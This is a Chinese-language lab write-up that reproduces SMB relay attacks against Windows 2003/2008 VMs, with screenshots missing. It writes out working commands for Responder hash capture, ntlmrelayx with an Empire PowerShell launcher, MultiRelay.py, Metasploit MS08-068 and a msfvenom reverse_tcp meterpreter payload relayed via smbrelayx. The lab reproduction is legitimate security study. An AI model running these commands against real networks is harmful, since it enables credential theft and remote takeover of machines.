SMB relay攻击复现

三台机器
kali:192.168.64.133
win2008:192.168.64.135
win2003:192.168.64.134

使用responder

（需要访问一个不存在的共享路径，因为要降到LLMNR NBNS）

image.png

然后去访问一个不存在的共享路径 dir \dc\d$
然后就抓到hash了

image.png

responder充其量只有一个回显hash功能，可以结合ntlmrelayx.py和Empire框架进行进一步利用
修改/etc/responder/Responder.conf禁用SMB和HTTP功能。
执行responder -I eth0 -r -d -v
利用empire

image.png

创建一个listeners

listeners 
uselistener http
set Host http://192.168.64.132:8080
set Port 8080
set Name test
execute

image.png

生成powershell命令：
launcher powershell

image.png

开启中继，python3 ntlmrelayx.py -t 192.168.64.134 -c 'powershell脚本生成的内容'

image.png

然后这边就开始毒化了

image.png

将Windows2003的密码改为与Windows2008一样之后，资源管理器访问\test，终于成功了。

image.png image.png image.png

排错：
1、Unexpected keyword argument 'randomize'
https://github.com/SecureAuthCorp/impacket/issues/781
2、有个日志的参数有问题，把那行注释掉就好了

MultiRelayx.py拿下shell

利用Impacket套件中的MultiRelay.py脚本进行中继攻击
先用responder工具包里面的RunFinger.py脚本进行扫描（nmap皆可）来查看域内机器SMB签名的开放情况
./RunFinger.py -i 192.168.64.0/24

image.png

发现 SMB 签名都已禁用了，接下来开始 利用
python MultiRelay.py -t 192.168.64.134 -u ALL

image.png

现在 SMB 已经由 MultiRelay.py 脚本来进行中继，我们需要修改一下 Responder.conf 脚 本，不让其对 hash 进行抓取

image.png

重启Responder.py 准备毒化

image.png

此时去win2003的机器上 传递一个SMB流量

image.png image.png

使用msf的smb_relay（MS-08 068）

image.png

win2003 cmd输入dir \192.168.64.133\c$ kali中就能看到：

image.png

直接就getshell了，因为是系统服务：

image.png

Impacket中的smbrelayx

先生成一个msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.64.133 LPORT=4445 -e x86/shikata_ga_nai -f exe -o ~\test.exe

image.png
image.png

然后使用监听模块（exploit -j是将得到的session放到后台）

image.png

运行smbrelayx.py（需要python3的环境），随后在Windows2003上执行dir \192.168.64.133\c$

image.png

成功获得会话

image.png

03的登录日志：

image.png